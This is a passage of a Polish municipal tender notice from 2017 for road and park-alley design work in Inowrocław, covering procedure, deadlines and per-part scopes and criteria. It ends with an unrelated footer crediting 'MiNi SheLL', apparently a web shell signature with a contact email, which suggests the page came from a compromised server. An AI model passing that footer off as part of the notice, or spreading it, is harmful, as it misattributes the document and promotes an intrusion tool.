2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług projektowych, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Kryteria oceny ofert (oddzielnie dla każdej części) określone zostały w załączniku I - informacje dotyczące ofert częściowych.</td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach: 1) Wykonawca złożył pisemny uzasadniony wniosek, że termin wykonania umowy nie może zostać zachowany z przyczyn, za które nie odpowiada, w szczególności wystąpiło przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji lub inne właściwe podmioty decyzji, zezwoleń, uzgodnień itp. oraz szczególnie skomplikowanych rozwiązań projektowych, 2) działania siły wyższej, 3) ustawowej zmiany wysokości podatku od towarów i usług VAT, 4) zmiany warunków finansowania zamówienia. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron w formie pisemnej zastrzeżonej pod rygorem nieważności.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 13/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przebudowa ulicy Kościelskiego w Inowrocławiu wraz z infrastrukturą towarzyszącą<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cz. 1 - przebudowa ulicy Kościelskiego wraz z infrastrukturą towarzyszącą w Inowrocławiu, długości 175 m (orientacyjny przebieg ulicy i zakres opracowania pokazany jest na załączonym do SIWZ planie). Przeznaczony do przebudowy odcinek ulicy posiada nawierzchnię gruntową.
 
1) Podstawowe wytyczne do projektowania:
a) nawierzchnia jezdni z kostki betonowej szarej gr. 8 cm i szerokości 6,0 m, 
b) chodnik strona lewa z kostki betonowej, szarej gr. 8 cm i szerokości 2,0 m,
c) stanowiska postojowe dla samochodów osobowych z kostki betonowej gr. 8 cm, kolor antracyt,
d) strona prawa pas zieleni do wykorzystania na chodnik i zjazdy po zabudowie tej strony,
e) zjazdy do posesji wyróżnić kostką innego koloru, np. czerwoną,
f) rozbudowa kanalizacji deszczowej, sanitarnej, sieci wodociągowej z wykonaniem przyłączy do granicy działek (posesji) - wg. warunków Przedsiębiorstwa Wodociągów i Kanalizacji Sp. z o.o. w Inowrocławiu;
g) budowa oświetlenia ulicy (ledowe);
h) regulacja lub przebudowa wszystkich urządzeń uzbrojenia technicznego w zależności od potrzeb;
2) w ramach przedmiotu zamówienia należy: 
a) przeprowadzić badania geotechniczne podłoża gruntowego;
b) wykonać inwentaryzację geodezyjną terenu;
c) przedstawić Zamawiającemu przed podpisaniem umowy harmonogram realizacji prac projektowych,
d) przedstawić Zamawiającemu, po upływie 1 miesiąca od zawarcia umowy, koncepcję przebudowy ulicy, a po jej uzgodnieniu przystąpić do dalszych prac projektowych;
e) złożyć w imieniu Zamawiającego wniosek do właściwego organu o wydanie decyzji o  pozwoleniu na budowę lub zgłosić przebudowę (w zależności od rozwiązań projektowych);
f) wykonać: 
- projekt budowlany i projekty wykonawcze przebudowy  ulicy wraz z kanalizacją deszczową, sanitarną, siecią wodociągową i oświetleniem, 
- projekt stałej i czasowej organizacji ruchu, 
- informację dla planu BIOZ dla robót będących przedmiotem zamówienia,                                  z uwzględnieniem wymagań ochrony środowiska naturalnego;
- kosztorys inwestorski i przedmiar robót (z podziałem na wszystkie branże),
- specyfikacje techniczne wykonania i odbioru robót budowlanych (z uwzględnieniem każdej branży).  <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 5<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1) cena </td><td>58.00</td></tr><tr><td>2) kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</td><td>42.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Tymczasowe utwardzenie nawierzchni ulic w Inowrocławiu, tj.:                    a) ul. Polnej (odcinek od ul. Kolejowej do ul. Wiejskiej),                   b) ul. Kolejowej (odcinek od ul. Stanisława Przybyszewskiego w kierunku miasta),                   c) ul. Droga do Lotniska, ul. Ikara, ul. Dedala, ul. Tadeusza Śliwaka, ul. Andrzeja Rakoczego, ul. Józefa Dankowskiego,                  d) ul. Radosnej, ul. Szczęśliwej i ul. Szybowcowej (odcinek od ul. Rotmistrza Witolda Pileckiego w kierunku ulic: Radosnej i Szczęśliwej);<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cz. 2 - tymczasowe utwardzenie nawierzchni ulic w Inowrocławiu, tj.: 
1) ul. Polnej (odcinek od ul. Kolejowej do ul. Wiejskiej),
2) ul. Kolejowej (odcinek od ul. Stanisława Przybyszewskiego w kierunku miasta),
3) ul. Droga do Lotniska, ul. Ikara, ul. Dedala, ul. Tadeusza Śliwaka, ul. Andrzeja Rakoczego, ul. Józefa Dankowskiego,
4) ul. Radosnej, ul. Szczęśliwej i ul. Szybowcowej (odcinek od ul. Rotmistrza Witolda Pileckiego w kierunku ulic: Radosnej i Szczęśliwej).

Ad. 1) Ulica Polna  odcinek od skrzyżowania z ul. Kolejową do ul. Wielkopolskiej, długości ok. 378 m (orientacyjny przebieg ulicy i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym):  
Projekt tymczasowego utwardzenia powinien:
- uwzględniać wykonanie nawierzchni z masy MB szerokości 4,0 m z obustronną 0,5 m opaską z kamienia łamanego dla kategorii ruchu KR-2, bez chodników;
- zakładać odwodnienie powierzchniowe, które powinno być uzgodnione z Wydziałem Gospodarki Komunalnej, Środowiska i Rolnictwa;
- być uzgodniony z PKP S.A. w obrębie działki nr 59 oraz przejazdu kolejowego przy ul. Wiejskiej.
Wykonawca dokona w imieniu Zamawiającego zgłoszenia o przebudowie nawierzchni do właściwego organu.  
Ad. 2) ulica Kolejowa - odcinek od ul. Stanisława Przybyszewskiego w kierunku północnym - długości ok. 187 m (orientacyjny przebieg ulicy i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym):
Projekt tymczasowego utwardzenia nawierzchni powinien uwzględniać:
- wykonanie nawierzchni z masy MB szerokości 4,0 m z obustronną 0,5 m opaską z kamienia łamanego dla kategorii ruchu KR-2, bez chodników;
- elementy uspokojenia ruchu drogowego;
-  wykonanie systemu odprowadzającego wody opadowe, zwłaszcza w początkowym przebiegu od ul. Stanisława Przybyszewskiego, gdzie tworzą się duże zastoiska wody, których przyczynami są: brak możliwości odprowadzenia wody na tereny przyległe, ulica po obu stronach posiada zabudowania, niższe położenie w stosunku do poziomu nawierzchni ul. Stanisława Przybyszewskiego i częściowe spływanie wody z ul. Stanisława Przybyszewskiego,
- opracowanie, zatwierdzenie i wprowadzenie zmiany organizacji ruchu. 
Wykonawca dokona w imieniu Zamawiającego zgłoszenia o przebudowie nawierzchni do właściwego organu.  
Ad. 3) Ulice: Droga do Lotniska, Ikara, Dedala, Tadeusza Śliwaka, Andrzeja Rakoczego, Józefa Dankowskiego skomunikowane są w kolejności odwrotnej z ulicą Toruńską (ostatnia ul. Józefa Dankowskiego)  ul. Droga do Lotniska o długości ok. 214 m, ul. Ikara o długości ok. 272 m, ul. Dedala o długości ok. 63 m, ul. Tadeusza Śliwaka o długości ok. 195 m, ul. Andrzeja Rakoczego o długości ok. 95 m, ul. Józefa Dankowskiego o długości ok. 137 m (orientacyjny przebieg ulic i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym): 
Projekt tymczasowego utwardzenia powinien uwzględniać:
- wykonanie nawierzchni z masy MB szerokości 4,0 m z obustronną 0,5 m opaską z kamienia łamanego dla kategorii ruchu KR-2, bez chodników,
- elementy uspokojenia ruchu drogowego;
- odwodnienie powierzchniowe, które powinno być uzgodnione z Wydziałem Gospodarki Komunalnej, Środowiska i Rolnictwa.
Wykonawca dokona w imieniu Zamawiającego zgłoszenia o przebudowie nawierzchni do właściwego organu.  
Ad. 4) Ulice: Radosna i Szczęśliwa poprzez odcinek ulicy Szybowcowej skomunikowane są z ulicą Rotmistrza Witolda Pileckiego  ul. Radosna o długości ok. 592 m, ul. Szczęśliwa o długości ok. 208 m, odcinek ulicy Szybowcowej o długości ok. 273 m (orientacyjny przebieg ulic i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym): 
Projekt tymczasowego utwardzenia powinien uwzględniać:
- wykonanie nawierzchni z masy MB szerokości 4,0 m z obustronną 0,5 m opaską z kamienia łamanego dla kategorii ruchu KR-2, bez chodników,
- elementy uspokojenia ruchu drogowego,
- odwodnienie powierzchniowe, które powinno być uzgodnione z Wydziałem Gospodarki Komunalnej, Środowiska i Rolnictwa.
Wykonawca dokona w imieniu Zamawiającego zgłoszenia o przebudowie nawierzchni  do właściwego organu.  <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 3<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1) cena </td><td>60.00</td></tr><tr><td>2) kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Przebudowa alejek w parku na Osiedlu Piastowskim III w Inowrocławiu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cz. 3 - przebudowa alejek w parku na Osiedlu Piastowskim III w Inowrocławiu, działka nr 130/20, arkusz 73, obręb 6 (z wyłączeniem zrealizowanych w 2016 r. chodników w obrębie pawilonu przy ul. Bolesława Krzywoustego). Długość wszystkich alejek wynosi ok. 1 066,00 m (orientacyjny przebieg alejek i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym). 
W zakres projektu wchodzi:
1) nawierzchnia alejek z masy bitumicznej,
2) chodniki i dojścia,
3) odwodnienie powierzchniowe.
Projektant powinien przewidzieć i uzgodnić drogi dowozu materiałów.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 3<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1) cena </td><td>60.00</td></tr><tr><td>2) kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Ułożenie nawierzchni bitumicznej ul. Bolesława Chrobrego w Inowrocławiu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cz. 4 - ułożenie nawierzchni bitumicznej ul. Bolesława Chrobrego (na odcinku od ul. Szymborskiej do ul. Kasztanowej) w Inowrocławiu (orientacyjny przebieg ulicy i zakres opracowania pokazany jest na załączonym do SIWZ szkicu sytuacyjnym).
Ulica Bolesława Chrobrego skomunikowana jest z jednej strony z ul. Szymborską, a z drugiej z ul. Kasztanową, o długości ok. 590 m, szerokości od ok. 6 do ok. 8 m.
W zakres projektu wchodzi: 
1) regulacja i wymiana krawężników (w miejscach tego wymagających), 
2) ułożenie nawierzchni bitumicznej poprzedzone frezowaniem,  
3) wymiana progów zwalniających na progi z kostki betonowej,
4) opracowanie projektu czasowej i stałej organizacji ruchu i uzgodnienie projektu w Starostwie Powiatowym. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 3<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1) cena </td><td>60.00</td></tr><tr><td>2) kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com